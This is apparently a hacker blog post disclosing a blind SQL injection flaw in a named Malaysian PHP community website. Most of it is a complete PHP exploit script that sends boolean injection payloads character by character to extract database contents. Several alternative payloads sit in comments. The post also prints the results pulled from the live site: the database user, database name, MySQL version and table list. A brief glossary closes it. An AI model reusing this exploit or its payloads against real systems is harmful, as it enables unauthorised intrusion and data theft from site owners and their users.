HACKED: www.php.net.my prone to Blind SQL Injection Attacks

as this blog getting more and more crowd every single day (ahh.. we r public attention, we famous ;-), i decided to digging around for "Hacking Expose!" via google, and stumble upon one well known community website
at http://www.php.net.my/forum/thread.php/15/3854/1 and one of the poster were shout to point to this blog and the his posting sounds like this

http://hackingexpose.blogspot.com/

banyak yg tembus sql. ape da. 2009 dah nih.

then im getting curious to know, so the journey begin..

the issue..

Website: Kumpulan Pengguna PHP Malaysia
URL: http://www.php.net.my


the database user() fingerprinting as follow



so i end up writing some simple automation exploit for this, in php of cos, as im also "Pengguna PHP in Malaysia" ;-) the exploit can fuzz the parameter supplied (example table_name, column_name,) and will test the first char by char that return true statement. here the code :

function usage ()
{
echo "\nBlind (my)SQL Injection Exploit/Fuzzer".
"\nby 0x3a, hacking.expose@gmail.com\n".
"\nspecially made for www.php.net.my ;-)".
"\n\n";
exit ();
}


function query ($func, $chr, $pos)
{
// custom ur query as u like

$query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.tables where table_schema=database()),{$pos},1))={$chr}";

//$query = "15 AND ascii(substring((SELECT group_concat({$func}) from information_schema.columns where table_name=0x63686174746572 limit 0,1),{$pos},1))={$chr}";
//$query = "15 AND ascii(substring((user()),{$pos},1))={$chr}";
//$query = "15 AND ascii(substring((database()),{$pos},1))={$chr}";
//$query = "15 AND ascii(substring((@@version),{$pos},1))={$chr}";

$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}

function exploit ($host, $path, $func, $pos, $chr)
{
$chr = ord ($chr);
$fp = fsockopen ($host, 80);
$query = query ($func, $chr, $pos);
$request = "GET {$path}/replace/path/here/{$query} HTTP/1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);
while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);

if (preg_match ("/replace your expected string here/", $reply))
return true;
else
return false;
}


if ($argc != 4)

usage ();

$host = $argv [1];
$path = $argv [2];
$func = $argv [3];
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,-_.";
$pos = 1;
$chr = 0;

echo "\nResult: ";

while ($pos <= 99999)
{
if (exploit ($host, $path, $func, $pos, $key [$chr]))
{
echo $key [$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
?>

from the automation i came with the result as below (fuzzing the table_name, database, version)



as for the final result:

USER: phpnetmy_main@localhost
DATABASE: phpnetmy
VERSION: 5.0.67-community

TABLES:

chat
chatter
event
event_participants
fm_file
forum_category
forum_file_attach
forum_forums
forum_posts
forum_smileys
forum_smileys_code
forum_temp_attach
forum_topics
hds

the problem is common, in which the script not validate for user supplied input before use in SQL query. by removing the database error message but not fixing the core issue is not the solution. php.net.my has been contacted and waiting for reply.


Glossary:

Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through sql statements.